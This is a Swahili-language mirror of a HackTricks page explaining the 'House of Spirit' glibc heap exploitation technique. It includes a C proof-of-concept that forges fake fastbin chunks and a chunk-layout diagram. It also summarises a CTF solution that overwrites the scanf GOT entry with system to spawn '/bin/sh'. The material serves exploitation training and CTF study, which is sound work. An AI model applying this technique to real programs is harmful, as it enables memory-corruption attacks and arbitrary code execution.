Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/binary-exploitation/heap/house-of-spirit.md

6.3 KiB
Raw Blame History

Nyumba ya Roho

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Taarifa Msingi

Kanuni

Nyumba ya Roho ```c #include #include #include #include

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk { size_t prev_size; size_t size; struct fast_chunk *fd; struct fast_chunk *bk; char buf[0x20]; // chunk falls in fastbin size range };

int main() { struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr); printf("Main fake chunk:%p\n", &fake_chunks[0]); printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size" fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)" fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed' // Point to .fd as it's the start of the content of the chunk ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30); printf("Victim: %p\n", victim);

return 0; }

</details>

### Lengo

* Kuweza kuongeza anwani kwenye tcache / sanduku la haraka ili baadaye iwezekane kuialloka

### Mahitaji

* Shambulio hili linahitaji mshambuliaji aweze kuunda vipande vya bandia vya haraka vinavyoonyesha kwa usahihi thamani ya ukubwa wake na kisha kuweza kufuta kipande cha kwanza cha bandia ili kipate kwenye sanduku.

### Shambulio

* Unda vipande vya bandia vinavyopita vichungi vya usalama: utahitaji vipande vya bandia 2 kimsingi vikiashiria kwa usahihi thamani sahihi za ukubwa wake
* Kwa njia fulani fanikiwa kufuta kipande cha kwanza cha bandia ili kipate kwenye sanduku la haraka au tcache na kisha kialloke ili kubadilisha anwani hiyo

**Msimbo kutoka** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **ni mzuri kuelewa shambulio.** Ingawa muhtasari huu kutoka kwenye msimbo unafupisha vizuri:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/

{% hint style="info" %} Tafadhali kumbuka ni muhimu kuunda kipande cha pili ili kuepuka ukaguzi fulani wa akili. {% endhint %}

Mifano

  • CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html
  • Libc infoleak: Kupitia kwa kujaza kwa wingi niwezekanavyo kubadilisha kielekezi ili kielekee kwenye anwani ya GOT ili kuvuja anwani ya libc kupitia hatua ya kusoma ya CTF
  • House of Spirit: Kwa kudanganya kuhesabu ambayo inahesabu idadi ya "bunduki" niwezekanavyo kuzalisha ukubwa bandia wa kipande cha kwanza bandia, kisha kwa kudanganya "ujumbe" niwezekanavyo kudanganya ukubwa wa pili wa kipande na hatimaye kwa kudanganya kujaza niwezekanavyo kubadilisha kielekezi ambacho kitafutwa hivyo kipande chetu cha kwanza bandia kinatolewa. Kisha, tunaweza kukitenga na ndani yake kutakuwa na anwani ambapo "ujumbe" unahifadhiwa. Kisha, niwezekanavyo kufanya hii ielekee kuingia kwa scanf ndani ya jedwali la GOT, hivyo tunaweza kuibadilisha na anwani ya mfumo.
    Wakati scanf inaitwa tena, tunaweza kutuma kuingia "/bin/sh" na kupata shelishi.

Marejeo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: